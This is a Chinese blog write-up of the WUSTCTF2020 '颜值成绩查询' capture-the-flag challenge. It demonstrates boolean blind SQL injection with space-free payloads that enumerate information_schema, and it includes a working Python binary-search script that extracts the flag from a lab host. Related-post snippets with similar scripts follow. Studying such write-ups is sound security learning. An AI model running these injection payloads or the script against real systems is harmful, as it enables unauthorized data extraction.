[WUSTCTF2020]颜值成绩查询1

已于 2024-06-10 21:49:35 修改
阅读量356 收藏
点赞数 7
文章标签: web安全 安全
于 2024-06-10 21:32:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/alwtj/article/details/139582224
版权

开局一个输入框,输入number查询成绩,还有2行报错,典型的sql注入题~

输个1看看~

测试了一下从1输到了5,第五个显示 student number not exists.

输入1 0 0 / 1 0 0

 没有出错,说明是数字型注入而且空格被过滤了~

又试了试报错,联合注入之类的,结果输出的都是student number not exists.

那就用一下盲注吧~

构造一下payload

?stunum=(ascii(substr(database(),1,1))>0)

没有出错,说明payload构建成功,那就开始写python代码~

import requests


url='http://1cd151eb-1d8c-40cf-89f3-535fe0b99d9c.node5.buuoj.cn:81/'
data=""

payload1="?stunum=(ascii(substr(database(),{},1))>{})" #获取数据库名
payload2="?stunum=(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),{},1))>{})" #获取表名
payload3="?stunum=(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_schema='ctf')and(table_name='flag')),{},1))>{})" #获取字段名
payload="?stunum=(ascii(substr((select(value)from(flag)),{},1))>{})" #获取字段value
for i in range(1,100):
    low = 32
    hight = 127
    mid = (low + hight) // 2
    while(low < hight):
        new_url=url+payload.format(i,mid)
        r=requests.get(new_url)
        print(new_url)
        if "Hi admin, your score is: 100" in r.text:
            low=mid+1
        else:
            hight=mid
        mid=(low+hight)//2
    if(mid==32):
        break
    data+=chr(mid)

print(data)

这段代码用了二分查找,开始执行~

获得flag,游戏结束~ 

alwtj
关注
  • 7
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[WUSTCTF2020]颜值成绩查询 1
qq_51553814的博客
08-22 648
[WUSTCTF2020]颜值成绩查询 1 解题 就是一个布尔盲注,尝试自己写了一下python脚本,磕磕绊绊最后还是写出来了 主要是学了一个二分法,理解了一下 import requests url="http://f8aed0d0-ab96-4a36-8022-2a70701fe282.node4.buuoj.cn:81/?stunum=" name='' for i in range(1,100): print(i) low=32 high=128 mid=(lo
[WUSTCTF2020]颜值成绩查询 布尔盲注
qq_37301470的博客
12-02 273
[WUSTCTF2020]颜值成绩查询 只有一个输入框,是sql注入题目 尝试输入1,2,3 可以发现是get方法提交的参数且是数字型 故用hackbar /?stunum=1 or 1=2 %23 student number not exists. 刚刚还可以查到现在查不到了判断存在过滤 尝试下发现是空格 上盲注脚本 import string import requests select=f"select/**/value/**/from/**/flag" ans="" for i in ran
[WUSTCTF2020]颜值成绩查询(布尔注入)
记录学习,一起进步
01-27 781
[WUSTCTF2020]颜值成绩查询(布尔注入)
[WUSTCTF2020]颜值成绩查询
pakho_C的博客
08-14 1190
测试输入1-5 各有输出,1为 Hi admin, your score is: 100。0和大于6的显示 student number not exists.[WUSTCTF2020]颜值成绩查询。得到字段名为flag,value。得到表名为flag和score。参考我做的另外一道题的。得到数据库名为ctf。...
re学习笔记(56)WUSTCTF – Re方向WP
12-21
接下来,我们讨论了"re-level1"。在这个级别,作者发现了一个19位的flag经过某种变换后被输出。通过分析程序的main函数,特别是其中的循环结构,作者编写了一个脚本来模拟这个变换过程,从而得到了正确的flag:`wctf...
linux操作系统入门实验报告
03-09
- `cp`:复制文件或目录,`cp file1 file2`将file1复制为file2。 - `mv`:移动或重命名文件或目录,`mv oldfile newfile`重命名文件。 - `cat`:查看文件内容,如`cat filename`显示文件内容。 - `more`或`less`...
23种设计模式汇集       
07-09
### 23种设计模式汇集知识点详解 #### 设计模式概览 设计模式是一套被反复使用、多数人知晓的、经过分类编目的、代码设计经验的总结。它描述了在软件设计过程中的一些不断重复发生的问题,以及该问题的解决方案。...
Flash8help_cn.part4
01-13
Flash8help_cn.part4.共有6卷,须全部下载才能解压缩。flash 教程 帮助文档 动漫 计算机
[WUSTCTF2020]颜值成绩
shinygod的博客
04-09 433
知识点:布尔盲注 当我们输入1,2,3,4的时候都有回显,但是当输入5的时候会回显 判断布尔盲注,测试一波 这种显示不存在 1'and length(database()) >1# 当用异或注入的时候显示正确1^1^1,并回显Hi admin,这样我们就可以由此来盲注。 import re import requests import string url = "http://ebb62726-0fba-430e-bf27-5e7214c31577.node4.buuoj.cn:81/" f
SQL布尔盲注 —— 【WUST-CTF2020】颜值成绩查询
Ve99tr’s Blog
03-30 1919
sql布尔盲注
[WUSTCTF2020]颜值成绩查询 -wp
freerats的博客
08-05 584
改变参数stunum发现页面会发生变化。 通过尝试可知参数处有boolean盲注,0^1会出现1的内容,因此判断具有盲注。 写脚本跑一下: import requests url='http://57e002cb-19bd-4ceb-bc2a-6960ff6347ac.node3.buuoj.cn/index.php' flag='' for i in range(50): a = 32 b = 128 mid = (a+b)//2 while(a<b): .
[WUSTCTF2020]朴实无华
最新发布
09-19
[WUSTCTF2020]朴实无华是一道CTF比赛的题目。根据给出的代码,该题目包含三个关卡。在第一个关卡中,如果传入的参数$num的整数值小于2020且大于2021,会输出一条特定的字符串。在第二个关卡中,如果传入的参数$md5的md5值等于$md5本身,会输出另一条特定的字符串。在第三个关卡中,如果传入的参数$get_flag中不包含空格,则会将$get_flag传给系统函数进行执行,并输出一条特定的字符串。 关于题目的
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值